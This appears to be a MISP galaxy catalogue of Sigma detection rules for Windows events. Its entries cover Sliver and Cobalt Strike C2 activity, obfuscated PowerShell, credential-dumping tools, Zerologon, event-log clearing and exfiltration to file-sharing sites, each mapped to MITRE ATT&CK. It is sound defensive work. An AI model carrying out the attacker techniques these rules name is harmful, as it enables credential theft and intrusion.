https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml

Sliver C2 Default Service Installation

Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands

The tag is: misp-galaxy:sigma-rules="Sliver C2 Default Service Installation"

Sliver C2 Default Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9211. Table References

Links

https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231

https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml

Invoke-Obfuscation Obfuscated IEX Invocation - System

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation - System"

Invoke-Obfuscation Obfuscated IEX Invocation - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 9212. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml

Invoke-Obfuscation VAR+ Launcher - System

Detects Obfuscated use of Environment Variables to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher - System"

Invoke-Obfuscation VAR+ Launcher - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9213. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml

New PDQDeploy Service - Server Side

Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines

The tag is: misp-galaxy:sigma-rules="New PDQDeploy Service - Server Side"

New PDQDeploy Service - Server Side has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9214. Table References

Links

https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml

Service Installation in Suspicious Folder

Detects service installation in suspicious folder appdata

The tag is: misp-galaxy:sigma-rules="Service Installation in Suspicious Folder"

Service Installation in Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9215. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System

Detects Obfuscated Powershell via VAR++ LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9216. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml

RTCore Suspicious Service Installation

Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse

The tag is: misp-galaxy:sigma-rules="RTCore Suspicious Service Installation"

Table 9217. Table References

Links

https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml

Service Installed By Unusual Client - System

Detects a service installed by a client which has PID 0 or whose parent has PID 0

The tag is: misp-galaxy:sigma-rules="Service Installed By Unusual Client - System"

Service Installed By Unusual Client - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9218. Table References

Links

https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml

PsExec Service Installation

Detects PsExec service installation and execution events

The tag is: misp-galaxy:sigma-rules="PsExec Service Installation"

PsExec Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9219. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml

NetSupport Manager Service Install

Detects NetSupport Manager service installation on the target system.

The tag is: misp-galaxy:sigma-rules="NetSupport Manager Service Install"

Table 9220. Table References

Links

http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml

Windows Defender Threat Detection Disabled - Service

Detects the "Windows Defender Threat Protection" service has been disabled

The tag is: misp-galaxy:sigma-rules="Windows Defender Threat Detection Disabled - Service"

Windows Defender Threat Detection Disabled - Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9221. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_defender_disabled.yml

Suspicious Service Installation Script

Detects suspicious service installation scripts

The tag is: misp-galaxy:sigma-rules="Suspicious Service Installation Script"

Suspicious Service Installation Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9223. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml

TacticalRMM Service Installation

Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.

The tag is: misp-galaxy:sigma-rules="TacticalRMM Service Installation"

TacticalRMM Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9224. Table References

Links

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml

Credential Dumping Tools Service Execution - System

Detects well-known credential dumping tools execution via service execution events

The tag is: misp-galaxy:sigma-rules="Credential Dumping Tools Service Execution - System"

Credential Dumping Tools Service Execution - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9225. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_mal_creddumper.yml

KrbRelayUp Service Installation

Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)

The tag is: misp-galaxy:sigma-rules="KrbRelayUp Service Installation"

KrbRelayUp Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9226. Table References

Links

https://github.com/Dec0ne/KrbRelayUp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml

Invoke-Obfuscation Via Use MSHTA - System

Detects Obfuscated Powershell via use MSHTA in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA - System"

Invoke-Obfuscation Via Use MSHTA - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9227. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml

Uncommon Service Installation Image Path

Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.

The tag is: misp-galaxy:sigma-rules="Uncommon Service Installation Image Path"

Uncommon Service Installation Image Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9228. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_uncommon.yml

Invoke-Obfuscation Via Use Clip - System

Detects Obfuscated Powershell via use Clip.exe in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip - System"

Invoke-Obfuscation Via Use Clip - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9229. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml

Invoke-Obfuscation CLIP+ Launcher - System

Detects Obfuscated use of Clip.exe to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher - System"

Invoke-Obfuscation CLIP+ Launcher - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9230. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml

Tap Driver Installation

Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques

The tag is: misp-galaxy:sigma-rules="Tap Driver Installation"

Tap Driver Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 9231. Table References

Links

https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml

Service Installation with Suspicious Folder Pattern

Detects service installation with suspicious folder patterns

The tag is: misp-galaxy:sigma-rules="Service Installation with Suspicious Folder Pattern"

Service Installation with Suspicious Folder Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9232. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml

Remote Utilities Host Service Install

Detects Remote Utilities Host service installation on the target system.

The tag is: misp-galaxy:sigma-rules="Remote Utilities Host Service Install"

Table 9233. Table References

Links

https://www.remoteutilities.com/support/kb/host-service-won-t-start/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml

Eventlog Cleared

One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution

The tag is: misp-galaxy:sigma-rules="Eventlog Cleared"

Eventlog Cleared has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 9234. Table References

Links

https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100

https://twitter.com/deviouspolack/status/832535435960209408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml

Important Windows Eventlog Cleared

Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution

The tag is: misp-galaxy:sigma-rules="Important Windows Eventlog Cleared"

Important Windows Eventlog Cleared has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 9235. Table References

Links

https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100

https://twitter.com/deviouspolack/status/832535435960209408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml

Zerologon Exploitation Using Well-known Tools

This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname.

The tag is: misp-galaxy:sigma-rules="Zerologon Exploitation Using Well-known Tools"

Zerologon Exploitation Using Well-known Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 9236. Table References

Links

https://www.secura.com/blog/zero-logon

https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml

Vulnerable Netlogon Secure Channel Connection Allowed

Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.

The tag is: misp-galaxy:sigma-rules="Vulnerable Netlogon Secure Channel Connection Allowed"

Vulnerable Netlogon Secure Channel Connection Allowed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 9237. Table References

Links

https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml

Sysmon Application Crashed

Detects application popup reporting a failure of the Sysmon service

The tag is: misp-galaxy:sigma-rules="Sysmon Application Crashed"

Sysmon Application Crashed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9238. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/application_popup/win_system_application_sysmon_crash.yml

KDC RC4-HMAC Downgrade CVE-2022-37966

Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation

The tag is: misp-galaxy:sigma-rules="KDC RC4-HMAC Downgrade CVE-2022-37966"

Table 9239. Table References

Links

https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml

Certificate Use With No Strong Mapping

Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID) This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.

The tag is: misp-galaxy:sigma-rules="Certificate Use With No Strong Mapping"

Table 9240. Table References

Links

https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml

DHCP Server Loaded the CallOut DLL

This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded

The tag is: misp-galaxy:sigma-rules="DHCP Server Loaded the CallOut DLL"

DHCP Server Loaded the CallOut DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9241. Table References

Links

https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx

https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html

https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml

DHCP Server Error Failed Loading the CallOut DLL

This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded

The tag is: misp-galaxy:sigma-rules="DHCP Server Error Failed Loading the CallOut DLL"

DHCP Server Error Failed Loading the CallOut DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9242. Table References

Links

https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx

https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html

https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml

Suspicious Digital Signature Of AppX Package

Detects execution of AppX packages with known suspicious or malicious signature

The tag is: misp-galaxy:sigma-rules="Suspicious Digital Signature Of AppX Package"

Table 9243. Table References

Links

Internal Research[Internal Research]

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml

HybridConnectionManager Service Running

Rule to detect the Hybrid Connection Manager service running on an endpoint.

The tag is: misp-galaxy:sigma-rules="HybridConnectionManager Service Running"

HybridConnectionManager Service Running has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"

Table 9244. Table References

Links

https://twitter.com/Cyb3rWard0g/status/1381642789369286662

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml

Unsigned Binary Loaded From Suspicious Location

Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations

The tag is: misp-galaxy:sigma-rules="Unsigned Binary Loaded From Suspicious Location"

Unsigned Binary Loaded From Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9245. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml

Microsoft Defender Blocked from Loading Unsigned DLL

Detects Code Integrity (CI) engine blocking Microsoft Defender’s processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL

The tag is: misp-galaxy:sigma-rules="Microsoft Defender Blocked from Loading Unsigned DLL"

Microsoft Defender Blocked from Loading Unsigned DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9246. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml

WMI Persistence

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

The tag is: misp-galaxy:sigma-rules="WMI Persistence"

WMI Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9247. Table References

Links

https://twitter.com/mattifestation/status/899646620148539397

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml

DNS Query for Anonfiles.com Domain - DNS Client

Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes

The tag is: misp-galaxy:sigma-rules="DNS Query for Anonfiles.com Domain - DNS Client"

DNS Query for Anonfiles.com Domain - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 9248. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml

DNS Query To MEGA Hosting Website - DNS Client

Detects DNS queries for subdomains related to MEGA sharing website

The tag is: misp-galaxy:sigma-rules="DNS Query To MEGA Hosting Website - DNS Client"

DNS Query To MEGA Hosting Website - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 9249. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml

Query Tor Onion Address - DNS Client

Detects DNS resolution of an .onion address related to Tor routing networks

The tag is: misp-galaxy:sigma-rules="Query Tor Onion Address - DNS Client"

Query Tor Onion Address - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

Table 9250. Table References

Links

https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml

DNS Query To Ufile.io - DNS Client

Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

The tag is: misp-galaxy:sigma-rules="DNS Query To Ufile.io - DNS Client"

DNS Query To Ufile.io - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 9251. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml

Suspicious Cobalt Strike DNS Beaconing - DNS Client

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

The tag is: misp-galaxy:sigma-rules="Suspicious Cobalt Strike DNS Beaconing - DNS Client"

Suspicious Cobalt Strike DNS Beaconing - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 9252. Table References

Links

https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/

https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_clientmal_cobaltstrike.yml

File Was Not Allowed To Run

Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.

The tag is: misp-galaxy:sigma-rules="File Was Not Allowed To Run"

File Was Not Allowed To Run has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 9253. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker

https://nxlog.co/documentation/nxlog-user-guide/applocker.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml

Potential Active Directory Reconnaissance/Enumeration Via LDAP

Detects potential Active Directory enumeration via LDAP

The tag is: misp-galaxy:sigma-rules="Potential Active Directory Reconnaissance/Enumeration Via LDAP"

Potential Active Directory Reconnaissance/Enumeration Via LDAP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 9254. Table References

Links

https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c

https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1

https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs

https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726

https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml

Suspicious AppX Package Installation Attempt

Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn’t meet the signing requirements and could be suspicious

The tag is: misp-galaxy:sigma-rules="Suspicious AppX Package Installation Attempt"

Table 9258. Table References

Links

https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/

https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting

Internal Research[Internal Research]

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml

Remove Exported Mailbox from Exchange Webserver

Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit

The tag is: misp-galaxy:sigma-rules="Remove Exported Mailbox from Exchange Webserver"

Remove Exported Mailbox from Exchange Webserver has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 9262. Table References

Links

